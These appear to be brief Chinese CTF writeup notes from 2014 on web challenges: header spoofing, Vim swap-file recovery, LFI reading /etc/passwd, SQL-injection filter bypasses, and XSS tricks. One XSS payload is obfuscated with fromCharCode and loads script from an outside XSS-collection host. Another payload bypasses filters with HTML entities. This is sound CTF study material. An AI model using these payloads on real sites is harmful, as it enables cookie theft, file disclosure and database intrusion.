2014

Writeups

Google hacking     x-forwarder-for不行,换另一个Client_ip

.htaccess 不要忘记

Vim编辑文件时产生,它是隐藏文件,原名是data,swp名就是.data.swp。新建个data,vim -r data就可恢复

base64的编码/9j/4AAQSkZJRgABAQEAYABgAAD,这样子的,看这个格式是一张base64编码过的图片,邮件中传输图像常常使用这种方式。

img src=”data:p_w_picpath/jpg;base64, /9j/4AAQSkZJRgABAQEAYABgAAD/….” />这样子保存成html就可以解开了。

直接include了进来,可以使用../进行跨目录的一些操作,包含到/etc/passwd等敏感的文件,在GPC关闭时可以使用进行截断,造成LFI漏洞。如果GPC开启时,就会对进行转义。

onload=document.body.a(createElement_x_x_x_x_x_x_x_x_x(/script/.source)).src=String.fromCharCode(47,47,108,47,51,67,57,101,101,52,63,49,51,57,56,50,52,56,52,48,48);//

使用了fromCharCode编码 //xss.sinaapp.com/3C9ee4?1398248400 

jsfuck  brainfuck  packed   (pp|rr|jj|aa)encode  

(#!/usr/bin/perl -w length q defined and| #!/usr/bin/env ruby $,^$$&&@_  | $=~[];$={___:++$,$$$$:(! | ω= /`m′) ~┻━┻   //*′`*)

secure标志是指定cookie要在https的传输协议中才会给带上的,现在的访问的是正常的http的协议,所以cookie不会被设置上,那么肯定是顺手就在发包中加上了这个cookie,试试看。也没有什么反应。

最后是在想display用怎么用的时候,是一个name=value的形式,然后想到了那个actf上的 way = “H4ck_F0r_Fun!GoGoGo!,是不是也要来试试看。然后就用get方式提交 ?display= 5842b0a0df2d52533c241c6ec26089a8作为参数。这个时候有了不一样的回显。

FTP 有主\被动两种模式,开端口情况不同。

得知2121端口正是pyftpd监听的FTP服务端口。上网搜索pyftpd历史漏洞,找到http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2073,

可知union select 空格,都被过滤掉了

union select 用uniunionon 和selselectect来绕过

空格可以用%09 %0A %0B %0C %0D代替,测试发现%0B是可以绕过的



JPG 格式会有压缩,所以不大可能基于像数的隐写,jpg的结尾符0XFFD9来确定


有一种绕过xss过滤的方法是html转义,(&#形式编码

<script>alert(1)</script> ---><script>&#097&#108&#101&#114&#116&#040&#049&#041</script>

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章